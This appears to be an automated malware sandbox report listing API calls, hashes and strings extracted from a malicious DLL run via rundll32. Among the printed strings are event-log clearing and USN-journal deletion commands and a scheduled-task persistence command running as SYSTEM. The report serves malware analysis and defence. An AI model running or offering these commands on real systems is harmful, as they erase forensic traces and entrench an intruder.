                                                                       • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: wsprintf
                                                                      • String ID: %wswevtutil cl %ws & $Application$Security$Setup$System$fsutil usn deletejournal /D %c:
                                                                      • API String ID: 2111968516-1905612841
                                                                      • Opcode ID: c941cc15ff33b0abc91355d45b3a764d6bd1446da50af481a4dee6beb6356f26
                                                                      • Instruction ID: 3a5c4bf57a539807853f0345fd0410e026e284fb7ce0b14b5b16aae440ab48af
                                                                      • Opcode Fuzzy Hash: c941cc15ff33b0abc91355d45b3a764d6bd1446da50af481a4dee6beb6356f26
                                                                      • Instruction Fuzzy Hash: C5118666A003286ADB60D6A49C89EE777ACDF04654F000A91F959D3101EB74EE848BB5
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00002000), ref: 04858A81
                                                                      • Sleep.KERNELBASE(000001F4), ref: 04858A90
                                                                      • GetSystemMetrics.USER32(00002000), ref: 04858A93
                                                                      • SetEvent.KERNEL32(?), ref: 04858A9C
                                                                      • Sleep.KERNEL32(000003E8), ref: 04858AAB
                                                                      • htonl.WS2_32(74DF0F00), ref: 04858AD4
                                                                      • htonl.WS2_32(74DF0F00), ref: 04858AE1
                                                                      • inet_ntoa.WS2_32(00000000), ref: 04858AE4
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 04858B02
                                                                      • HeapFree.KERNEL32(00000000), ref: 04858B09
                                                                      • LocalFree.KERNEL32(?,00002000,75C04920,74DF0F00), ref: 04858B1F
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                       • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: FreeHeapMetricsSleepSystemhtonl$EventLocalProcessinet_ntoa
                                                                      • String ID:
                                                                      • API String ID: 4223591894-0
                                                                      • Opcode ID: 6e02101c671d07008a9efb4234f46df97bb77f2d6afd075e7ed604e99f34ac85
                                                                      • Instruction ID: e27fefaa7f9757f7145cdb90506b89a1cb7d69abb10cce14408b7c5b4a7423ed
                                                                      • Opcode Fuzzy Hash: 6e02101c671d07008a9efb4234f46df97bb77f2d6afd075e7ed604e99f34ac85
                                                                      • Instruction Fuzzy Hash: C5118C71600309BBEB01BFA5DC88C5FBAACEF48340B048D26ED05E7111DA78FD418AA2
                                                                      APIs
                                                                      • wsprintfW.USER32 ref: 04857FD6
                                                                      • GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 04857FFA
                                                                      • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 0485800C
                                                                      • lstrcatW.KERNEL32(?,\cmd.exe), ref: 04858022
                                                                      • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04858069
                                                                      • Sleep.KERNELBASE(00000000), ref: 0485807F
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectoryEnvironmentProcessSleepSystemVariablelstrcatwsprintf
                                                                      • String ID: /c %ws$ComSpec$\cmd.exe
                                                                      • API String ID: 1518394870-1564754240
                                                                      • Opcode ID: 448afed0b8f3e8cce85c1b5972a9a2235d9bf23804b9198992c783da26626128
                                                                      • Instruction ID: 054382bcd987f555d39e85fac57f993c52c6f4085b4376be7a05eefa065b9016
                                                                      • Opcode Fuzzy Hash: 448afed0b8f3e8cce85c1b5972a9a2235d9bf23804b9198992c783da26626128
                                                                      • Instruction Fuzzy Hash: FE21AA726002086FDB10FFA5DC88EEB77ADEB54341F108966F946E6150E639EE588B30
                                                                      APIs
                                                                        • Part of subcall function 04857FB7: wsprintfW.USER32 ref: 04857FD6
                                                                        • Part of subcall function 04857FB7: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 04857FFA
                                                                        • Part of subcall function 04857FB7: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 0485800C
                                                                        • Part of subcall function 04857FB7: lstrcatW.KERNEL32(?,\cmd.exe), ref: 04858022
                                                                        • Part of subcall function 04857FB7: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04858069
                                                                        • Part of subcall function 04857FB7: Sleep.KERNELBASE(00000000), ref: 0485807F
                                                                      • Sleep.KERNELBASE(000007D0,schtasks /Delete /F /TN rhaegal,00000000,?,00000000), ref: 04851021
                                                                      • GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,schtasks /Delete /F /TN rhaegal,00000000,?,00000000), ref: 04851039
                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0485104B
                                                                      • lstrcatW.KERNEL32(?,\cmd.exe,?,00000000), ref: 04851061
                                                                      • wsprintfW.USER32 ref: 04851087
                                                                      Strings
                                                                      • ComSpec, xrefs: 04851034
                                                                      • schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "%ws /C Start \"\" \"%wsdispci.exe\" -id %u && exit", xrefs: 04851081
                                                                      • \cmd.exe, xrefs: 04851055
                                                                      • schtasks /Delete /F /TN rhaegal, xrefs: 0485100E
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryEnvironmentSleepSystemVariablelstrcatwsprintf$CreateProcess
                                                                      • String ID: ComSpec$\cmd.exe$schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "%ws /C Start \"\" \"%wsdispci.exe\" -id %u && exit"$schtasks /Delete /F /TN rhaegal
                                                                      • API String ID: 2538701606-2521368254
                                                                      • Opcode ID: fbd98b09f8c74e066c5ecfcb876d0f224d1153b94eec0a2e7d644a027276bc2d
                                                                      • Instruction ID: 80a7dc6e5a15bf36161ad29c79d3e8b5efcc76d52868f5b1e06ced9f64606e43
                                                                      • Opcode Fuzzy Hash: fbd98b09f8c74e066c5ecfcb876d0f224d1153b94eec0a2e7d644a027276bc2d
                                                                      • Instruction Fuzzy Hash: DF019676A003186BDB60BA759C0CED777BDDB85605F004A61BE09E2111DA7CEA44CFB1
                                                                      APIs
                                                                      • RegOpenKeyW.ADVAPI32(80000002,?,?), ref: 04851204
                                                                      • RegQueryValueExW.KERNELBASE(00000800,?,00000000,?,?,?,00000000,?), ref: 0485124F
                                                                      • memmove.MSVCRT(00000000,00000000,00000800), ref: 04851302
                                                                      • memcpy.MSVCRT(00000000,cscc,?), ref: 04851315
                                                                      • RegSetValueExW.KERNELBASE(00000800,00000007,00000000,00000007,?,00000800), ref: 04851334
                                                                      • RegFlushKey.ADVAPI32(00000800), ref: 04851344
                                                                      • RegCloseKey.KERNELBASE(00000800), ref: 04851359
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Value$CloseFlushOpenQuerymemcpymemmove
                                                                      • String ID: cscc
                                                                      • API String ID: 3731182797-3289078142
                                                                      • Opcode ID: 092236938b8a416dbee516b4ba9ba5e34d45c757055af19453b460b90bc750be
                                                                      • Instruction ID: ff0d657e744c2d007e048bff506303ccc26bc5726bcf0d5c397bc6c583ce431a
                                                                      • Opcode Fuzzy Hash: 092236938b8a416dbee516b4ba9ba5e34d45c757055af19453b460b90bc750be
                                                                      • Instruction Fuzzy Hash: 2C417E75900209EBDF109FA8DC49BDA7BB9FF04744F04CA65ED45E6160E735EA88CB90
                                                                      APIs
                                                                      • GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 04857448
                                                                      • GetProcessHeap.KERNEL32(00000000,?,00000000), ref: 04857466
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0485746D
                                                                      • GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 04857486
                                                                      • wsprintfW.USER32 ref: 048574D8
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04857504
                                                                      • HeapFree.KERNEL32(00000000), ref: 0485750B
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$ProcessTable$AllocFreewsprintf
                                                                      • String ID: %u.%u.%u.%u
                                                                      • API String ID: 2259129056-1542503432
                                                                      • Opcode ID: 5791a9f99d6248df8537fd43ce9af60e5f339096447dffa67e7bbd2aff46714b
                                                                      • Instruction ID: c38866a8c608a37bbe7a9b7d970c0fbfcb96035c099c85813917d9c520cb095a
                                                                      • Opcode Fuzzy Hash: 5791a9f99d6248df8537fd43ce9af60e5f339096447dffa67e7bbd2aff46714b
                                                                      • Instruction Fuzzy Hash: F731A5B2900219ABDB119FA9DC84DBFBBFCEF89305F148956ED01E6141D278AA05DB70
                                                                      APIs
                                                                      • EnterCriticalSection.KERNEL32(?,?,74DEDF60,74DEF380,?,?,04856A84,?,?,?), ref: 04856E87
                                                                        • Part of subcall function 04856DA4: EnterCriticalSection.KERNEL32(?,00000000,?,?,?,04856E98,?,00000000,?,?,04856A84,?,?), ref: 04856DB5
                                                                        • Part of subcall function 04856DA4: LeaveCriticalSection.KERNEL32(?,?,?,04856E98,?,00000000,?,?,04856A84,?,?), ref: 04856E0C
                                                                      • GetProcessHeap.KERNEL32(00000008,00000008,?,00000000,?,?,04856A84,?,?,?), ref: 04856EB8
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,04856A84,?,?,?), ref: 04856EC1
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,?,04856A84,?,?,?), ref: 04856ED9
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,04856A84,?,?,?), ref: 04856EDC
                                                                      • memcpy.MSVCRT(?,?,?,?,?,04856A84,?,?,?), ref: 04856F0D
                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,?,04856A84,?,?,?), ref: 04856F26
                                                                      • HeapFree.KERNEL32(00000000,?,?,04856A84,?,?,?), ref: 04856F29
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,?,?,04856A84,?,?,?), ref: 04856F41
                                                                      • HeapReAlloc.KERNEL32(00000000,?,?,04856A84,?,?,?), ref: 04856F48
                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,04856A84,?,?,?), ref: 04856F6C
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CriticalProcessSection$Alloc$EnterLeave$Freememcpy
                                                                      • String ID:
                                                                      • API String ID: 1369668251-0
                                                                      • Opcode ID: 8c2dc279df56f55dfac5d280f9eade2757e2e6a21ccf1e85ab2122f723b9c798
                                                                      • Instruction ID: 0fcb8453f260cdd212e7937e982256ffcbceb3c120de4c45d8be2d1856a1b143
                                                                      • Opcode Fuzzy Hash: 8c2dc279df56f55dfac5d280f9eade2757e2e6a21ccf1e85ab2122f723b9c798
                                                                      • Instruction Fuzzy Hash: 98315771A00A05ABDB219FA9D844D6AB7F9FF88304F408A08ED4AD7660EB35F915CF50
                                                                      APIs
                                                                      • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%,?,00000104), ref: 048510DD
                                                                      • PathAppendW.SHLWAPI(?,dispci.exe,?,?), ref: 0485119F
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 048511DC
                                                                      • HeapFree.KERNEL32(00000000), ref: 048511E3
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AppendEnvironmentExpandFreePathProcessStrings
                                                                      • String ID: %ALLUSERSPROFILE%$\$dispci.exe
                                                                      • API String ID: 1077166327-497635308
                                                                      • Opcode ID: c7a38d4c468eeaf2bd3e10e130526522c02c841f098e04afd06aca7d2840dace
                                                                      • Instruction ID: e371f5ab2eadfe2800ff3df1332eb69dceac2265f35059d1fc2fd69a9d0837ad
                                                                      • Opcode Fuzzy Hash: c7a38d4c468eeaf2bd3e10e130526522c02c841f098e04afd06aca7d2840dace
                                                                      • Instruction Fuzzy Hash: 1031A53594020E9ADF10BFE89C8DBE676A8EF04744F144EB5ED05C31A1F7B8AA848B50
                                                                      APIs
                                                                      • GetComputerNameExW.KERNEL32(00000004,?,?,?,?,?), ref: 0485781B
                                                                      • CreateThread.KERNELBASE(00000000,00000000,04858B2E,?,00000000,00000000), ref: 0485783D
                                                                      • CloseHandle.KERNELBASE(00000000), ref: 04857848
                                                                      • Sleep.KERNEL32(0002BF20,?,?), ref: 04857874
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: CloseComputerCreateHandleNameSleepThread
                                                                      • String ID: 0.0.0.0$127.0.0.1$localhost
                                                                      • API String ID: 452741230-4042105963
                                                                      • Opcode ID: 6df19c0054aa217868111ce422055dce1893cf0645d744e13afde3d16cf57600
                                                                      • Instruction ID: afe8cb4ab527a99e150d54a10a4c34c652099eabf77ededefd912483443dc099
                                                                      • Opcode Fuzzy Hash: 6df19c0054aa217868111ce422055dce1893cf0645d744e13afde3d16cf57600
                                                                      • Instruction Fuzzy Hash: E101B5F5500218BBF72077A99C8CD6BBABDDB45A58F504F28BE05F2021D6A8BD04D5B3
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0485A4A5
                                                                      • socket.WS2_32(00000002,00000001,00000000), ref: 0485A4C3
                                                                      • htons.WS2_32(?), ref: 0485A4E3
                                                                      • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0485A4F7
                                                                      • connect.WS2_32(00000000,?,00000010), ref: 0485A509
                                                                      • select.WS2_32(00000001,00000000,?,00000000,?), ref: 0485A536
                                                                      • __WSAFDIsSet.WS2_32(00000000,?), ref: 0485A549
                                                                      • closesocket.WS2_32(00000000), ref: 0485A557
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: closesocketconnecthtonsioctlsocketmemsetselectsocket
                                                                      • String ID:
                                                                      • API String ID: 1369790671-0
                                                                      • Opcode ID: 0c8ce56dca82e35bfaf1cc409c1d18d97ed61fe4b67ce0698bb414775b93c29e
                                                                      • Instruction ID: 93bc91a760a5f39c2672d57771a0223c57773c3f7521e31871d1e26b42b93708
                                                                      • Opcode Fuzzy Hash: 0c8ce56dca82e35bfaf1cc409c1d18d97ed61fe4b67ce0698bb414775b93c29e
                                                                      • Instruction Fuzzy Hash: 98317371800218BFDB10DFE8DC84DEEBBBCFF48310F004A5AE915E2150E7789A458B55
                                                                      APIs
                                                                      • GetComputerNameW.KERNEL32(?,?), ref: 04857F3B
                                                                      • wsprintfW.USER32 ref: 04857F7F
                                                                      • CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 04857F8E
                                                                      • GetLastError.KERNEL32 ref: 04857F99
                                                                      • GetLastError.KERNEL32 ref: 04857FAB
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$ComputerCreateMutexNamewsprintf
                                                                      • String ID: %08X%08X
                                                                      • API String ID: 4289762557-1563805794
                                                                      • Opcode ID: 13b19504c4e54c4c9294e21ad85ad642cefa0cc16078c118b56fc4bc6341c794
                                                                      • Instruction ID: 078fd3669d623a7cc281ad954e5c099166ef09429a8b77107f61607894a0c305
                                                                      • Opcode Fuzzy Hash: 13b19504c4e54c4c9294e21ad85ad642cefa0cc16078c118b56fc4bc6341c794
                                                                      • Instruction Fuzzy Hash: E4112E72610209EBEB10EEE4D9849EEB7FDEF48744F104A65EE05E2150DB78ED058761
                                                                      APIs
                                                                      • WNetOpenEnumW.MPR(00000001,00000000,00000000,?,0000FFFF), ref: 048575FD
                                                                      • GlobalAlloc.KERNEL32(00000040,00004000,00000000,?,00000000,0000FFFF), ref: 04857611
                                                                      • memset.MSVCRT ref: 0485762C
                                                                      • WNetEnumResourceW.MPR(0000FFFF,000000FF,00000000,00004000), ref: 04857640
                                                                      • GlobalFree.KERNEL32(00000000), ref: 048576D9
                                                                      • WNetCloseEnum.MPR(0000FFFF), ref: 048576E2
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Enum$Global$AllocCloseFreeOpenResourcememset
                                                                      • String ID:
                                                                      • API String ID: 4070278229-0
                                                                      • Opcode ID: 434863c2ca5d914c25e7625329576d332d6bfb1a83671f45de36ee968a526fc3
                                                                      • Instruction ID: 6f13c4fb504772dba1542f4bf0400f99d6d59ac2ade7aeef7d65a23bedafeff1
                                                                      • Opcode Fuzzy Hash: 434863c2ca5d914c25e7625329576d332d6bfb1a83671f45de36ee968a526fc3
                                                                      • Instruction Fuzzy Hash: 94319272800119EFDB20AF99C884DAEBBF9FF44304F50CA65ED05E7160D734AA44CB51
                                                                      APIs
                                                                      • htonl.WS2_32(74DF0F00), ref: 04858AD4
                                                                      • htonl.WS2_32(74DF0F00), ref: 04858AE1
                                                                      • inet_ntoa.WS2_32(00000000), ref: 04858AE4
                                                                        • Part of subcall function 0485641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,74D65350,?,74DF0F00), ref: 04856439
                                                                        • Part of subcall function 0485641A: GetProcessHeap.KERNEL32(00000000,00000000), ref: 04856446
                                                                        • Part of subcall function 0485641A: HeapAlloc.KERNEL32(00000000), ref: 0485644D
                                                                        • Part of subcall function 0485641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 04856465
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 04858B02
                                                                      • HeapFree.KERNEL32(00000000), ref: 04858B09
                                                                      • LocalFree.KERNEL32(?,00002000,75C04920,74DF0F00), ref: 04858B1F
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$ByteCharFreeMultiProcessWidehtonl$AllocLocalinet_ntoa
                                                                      • String ID:
                                                                      • API String ID: 3470587009-0
                                                                      • Opcode ID: b8942208d638a256866f8cb5826f9d1f5c265acc67f19287e0ca9ba676988bb5
                                                                      • Instruction ID: 6368b1a2fa14ced0a7edf35d3d79a985bb4387c61fd9c7ecbaa27202b650fe73
                                                                      • Opcode Fuzzy Hash: b8942208d638a256866f8cb5826f9d1f5c265acc67f19287e0ca9ba676988bb5
                                                                      • Instruction Fuzzy Hash: B8015EB2900314ABDB00AFB5DD88C5FBBACEF483547008D15E905E7111D678FE408A61
                                                                      APIs
                                                                      • GetCurrentThread.KERNEL32 ref: 0485A035
                                                                      • OpenThreadToken.ADVAPI32(00000000), ref: 0485A03C
                                                                      • DuplicateTokenEx.ADVAPI32(02000000,02000000,00000000,00000002,00000002,?), ref: 0485A059
                                                                      • CloseHandle.KERNEL32(?,04856AA8,00000000,00000000,00000000,00000024,04856AA8,00000000,0000FFFF), ref: 0485A0F5
                                                                      • CloseHandle.KERNEL32(0000FFFF,04856AA8,00000000,00000000,00000000,00000024,04856AA8,00000000,0000FFFF), ref: 0485A105
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandleThreadToken$CurrentDuplicateOpen
                                                                      • String ID:
                                                                      • API String ID: 3602278934-0
                                                                      • Opcode ID: 805c8390bdb83e24df40136a8e98bb0522dc242f9feb0b8fdbf2ca17ba75393f
                                                                      • Instruction ID: 35147fa6452e4ac49342060b362c89a080cc9c7ec6ea0ccd07eeed7d3f157551
                                                                      • Opcode Fuzzy Hash: 805c8390bdb83e24df40136a8e98bb0522dc242f9feb0b8fdbf2ca17ba75393f
                                                                      • Instruction Fuzzy Hash: 8B216F71504301AAE620EE659C88D5BBBECEFC5714F004F29B944E2161EA74A944CB63
                                                                      APIs
                                                                      • PathFindFileNameW.SHLWAPI(04867BC8,?,00000000,00000000), ref: 0485939C
                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000104,00000000,00000000), ref: 048593C8
                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 048593DF
                                                                      • inet_addr.WS2_32(?), ref: 048593E8
                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000208,00000000,00000000), ref: 04859418
                                                                        • Part of subcall function 04859332: gethostbyname.WS2_32(048593FF), ref: 0485933B
                                                                        • Part of subcall function 04859332: wsprintfA.USER32 ref: 04859365
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$FileFindNamePathgethostbynameinet_addrwsprintf
                                                                      • String ID:
                                                                      • API String ID: 3160354238-0
                                                                      • Opcode ID: 0183b5762f57201183c74c630ac3f785a8a70b5dbce7d68400d36bd83607a7cb
                                                                      • Instruction ID: b43f024b931f3e6e14781f97aeb0c3dd9401b414bca15e9d213c448f50f203b3
                                                                      • Opcode Fuzzy Hash: 0183b5762f57201183c74c630ac3f785a8a70b5dbce7d68400d36bd83607a7cb
